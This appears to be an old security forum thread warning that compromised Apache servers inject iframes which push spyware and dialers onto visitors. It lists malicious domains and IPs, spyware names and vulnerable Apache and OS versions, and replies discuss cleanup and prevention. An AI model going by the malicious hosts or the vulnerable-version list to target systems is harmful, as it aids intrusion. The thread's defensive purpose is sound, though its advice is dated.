We have discovered that a group of hackers (perhaps even a criminal gang) is hacking web servers all over the Net and installing root kits that dynamically inject code into the pages served from the compromised web servers. The injected code effectively serves as a "front door" to a number of different pages at these domains:

sp2fuc**d.biz
splitinfinity.info
xpire.info

Similar to Download_Ject, only this time it works on Apache Servers rather than Windows.

Using Iframes, a number of sites install anything up to 8MB worth of exploits on a users machine - viruses, trojans, scripts, malware packages - you name it, you'll end up with it.

Several other domains are used in that installation/exploit process, including:

69.50.168.147
195.178.160.30
213.159.117.133
b00gle.info
coolsearch.biz
newiframe.biz
pizdato.biz

Fair warning: do NOT visit any of these domains unless your box is well defended and updated, and you are prepared to deal with the unexpected.

The software installed on a users' PCs appears to vary. Sometimes the exploit pages listed above push porn dialers onto victims' PCs; other times a whole host of spyware and adware packages is installed.he packages that we've seen installed via this exploit include:

180solutions
BlazeFind
BookedSpace
BullsEye Networks
CashBack (Bargain Buddy)
ClickSpring
CoolWebSearch
DyFuca
Hoost
IBIS Toolbar
Internet Optimizer
ISTbar
Power Scan
SideFind
TIB Browser
WebRebates (TopMoxie)
WhenU (VVSN)
Window AdControl
WindUpdates
YourSiteBar

We have started seeing evidence of this exploit in victims' HJT logs at several anti-spyware forums -- a few samples:

»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»forums.spywareinfo.com/index.php?showt..
»castlecops.com/postlite85832-sp2****ed..
»castlecops.com/postlite86439-sp2****ed..
»castlecops.com/postlite86459-sp2****ed..
»castlecops.com/postlite87626-sp2****ed..
»computercops.biz/postp364469.html
»computercops.biz/postp364553.html
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forums.tomcoyote.org/index.php?showtop..
»forum.aumha.org/viewtopic.php?t=9340
»www.trojaner-board.de/archive/index.ph..

There have been a few other public discussion threads on the Net about this exploit. In particular, see:

http://www.gossamer-threads.com/lists/full...isclosure/27857 (http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/27857)

http://seclists.org/lists/fulldisclosure/2004/Oct/1031.html (http://seclists.org/lists/fulldisclosure/2004/Oct/1031.html)

Wayne Porter has some interesting comments on this exploit:

http://www.revenews.com/wayneporter/archiv...00285.html#more (http://www.revenews.com/wayneporter/archives/000285.html#more)

The worst thing is, these malware installations are just a front for massive sets of zombie boxes, and they're getting ready to point them somewhere. If you're an admin of an Apache box, PLEASE ensure that you are fully patched, especially in the area of OpenSSL exlpoits.

More will likely be made public in the coming weeks, but the infection is making its way round many home users PCs, and if you end up being hijacked, nothing short of a reformat will remove the garbage from your system.

IE-Spyad will block the domains listed:

https://netfiles.uiuc.edu/ehowes/www/resource.htm (https://netfiles.uiuc.edu/ehowes/www/resource.htm)

See below for more info on this:

http://www.benedelman.org/news/111804-1.html (http://www.benedelman.org/news/111804-1.html)

And here:

http://www.dslreports.com/forum/remark,11904374~mode=flat (http://www.dslreports.com/forum/remark,11904374~mode=flat)

/ EDIT - this is what is potentially vulnerable....

Caldera (Apache 1.3.26)
Cobalt Sun 6.0 (Apache 1.3.12 - 1.3.20)
Connectiva 4, 4.1, 6, 7, 8 (Apache 1.3.6, 1.3.9, 1.3.12, 1.3.14, 1.3.26)
Debian GNU (Apache 1.3.12 - 1.3.20)
FreeBSD
Mandrake 7.1, 7.2, 8.0, 8.1, 8.2, 9
RedHat 5.0 upto 8.0
Slackware 7.0 up to 8.1

Please help spread the word by placing this article on your sites. As much exposure as possible is needed here.

Just in case no one has seen this yet... Damn these people never give up:mad:

Thanks for the heads-up, yoda.

(BTW - the link in your signature 404's)

"Just in case no one has seen this yet... Damn these people never give up" --Yoda

"There is hardly anything in the world that man cannot make
a little worse and sell a little cheaper. . . ."-John Ruskin.

There's a line in song by Sade that reads "They, they enjoy cheapness, don't show them your weakness, go on, keeping looking...."

This is definitely serious stuff, thanks for the heads-up.

I think I've seen a coupe of the infected machines recently, I've cleaned up 3 in the past couple of weeks that had almost everything on the list above o them. One had 1130 objects found by AdAware, the one on my bench right now had 1004 I think, and still gets an error message that I can't fix or find any info about {Explorer has caused an error in <unknown>} and after cleaning out the spyware {Explorer has caused an error in FPLKBTN.DLL} I was already planning to call customer this morning and recommend a reinstall, now I think it's the best idea. The FPLKBTN file does not exist on the computer, and Google turns up zero hits for both filename and error message.

Everything on the list above was on this machine except

TIB Browser
Hoost
Window AdControl

The Windows and Windows\System folders both have a bunch of highly suspicious files listed, (Running Windows ME, by the way) filenames like ouidfyfb.exe and such, usually malware files, and I've renamed a dozen known spyware executables already. (I change the extension to OLD or BAD then delete after rebooting, just in case I renamed something I shouldn't have.)

It also has bxxs5.exe which is nearly impossible to remove, a downloader trojan that AdAware listed, (can't remember the name and like a dummy I didn't write it down).and a couple of things not on the list above.

The earlier computer was very close to the same, after trying to let AdAware remove everything it booted to a black screen with a blinking cursor, nothing worked at all, no Safe Mode or even boot menu, (running XP on that one) but fortunately I had already told customer a reinstall would be most likely.

Strange thing is I didn't find any porn diallers on either machine...that usually comes along with all this crud...

Pete and Yoda: thanks for the info. Let me ask on behalf of the understudy types, are we dealing with a new exploit that takes advantage of known methods or paths, or a new exploit that takes advantage in new ways. If the setup for these bugs is coming through servers, then, am I correct in thinking they then have to come through the web pages, it read that way to me, and if so, could there be a registry fix to block any of this garbage?

I'm thinking along the way of what was done to prevent the Zero-Day from getting loaded. Didn't we have with zero-day, I thnk it was Shanmauga's, a reg hack that somehow prevented picking up that bug?* If I'm recalling that correctly--that was an awful lot for an understudy type to try to digest, and this looks impossible for me at this point, so I'm just interested in preventative measures.

Pete, I'm on a (gulp) Me OS, so what can we do, or I guess I shuld ask, is it even close to the point where anyone has assayed what we can start to do?

Also, since it is coming through Apache servers--are these servers used for any particualr kind of websites. . .say information-based or text-based websites as opposed to graphics, or some other kind?

*If so where is that reg hack? I have since gone through a re-format and I don't have the file and the setting for it. Or am I confusing something with the reg hack for making My Computer visible in the security zones? I thought we had a reg hack that specifically prevented the entrance of the ZD into the registry.....

Well, thanks in any event. . .

Donn,
You are correct in the observation about infections from simply viewing a web page on one of the compromised servers.
Part of the prevention is using host files for the items being loaded by using programs like SpywareBlaster & IE SpyAds. The problem is the bad guys are throwing new stuff into the compromised servers and the host files blocking is only effective against "known" stuff.

Just released:
MS just released KB889293 Cumulative Update for IE 6.0 on the Windows Update site for all current OSes.
I downloaded it and it seems to have not broken anything yet. Too soon to tell if it fixes this IFrame problem though.
:rolleyes:

Seems the update does not include XP SP2.

Just a FYI:
KB889293 broke my Win98SE PCs ability to go to secure sites, particularly my iNotes and banking sites. I removed the patch and functionality returned. I guess MS wants me to use XP-SP2?
:(

Thanks for the heads-up, yoda.

(BTW - the link in your signature 404's)


Ahh thats because we had to change software we had a couple of hacks I'll have to fix that :rolleyes:

Donn: I think there's no one "registry hack" or similar for the home user, due to the sheer number of nasties thqat can be installed. This exploit, if I understand it right, is installed on web servers running mostly Apache (any type of website-graphics, text, Apache is the most popular web server software) that then inject code into the webpages they store. Apache (http://httpd.apache.org/) is software designed to host webpages for local and wide area networks, and is very popular for Internet webservers. Check out the "About" link for a brief write up on the history and origin of Apache.

The average surfer will get any of a number of malware programs installed, but the exploit itself can't infect most home users' machines, since not many run web servers. So we get the payload, but not the exploit itself. Prevention is the usual drill, Spyware Blaster, IESpyads, Adaware etc and...BE CAREFUL

Running ME shouldn't make much difference, if it's kept in good shape ME runs pretty well, and is no more unsecure than anything else M$ oozes out, but it has to be pampered more than 98 or XP. You're not standing in the middle of rush hour traffic, so to speak, just by running ME. This thing hits every OS that runs IE, so running an alternate browser is the best defense. I'm running Linux, even better still...and since I didn't even install Apache, it shouldn't be an issue.

Also any Windows, Linux or Unix web servers running Apache (lots of 'em out there) should be sure and get patches quick. Problem is usually they don't find out about it till we do...so by the time they know what to patch, it's already spreading.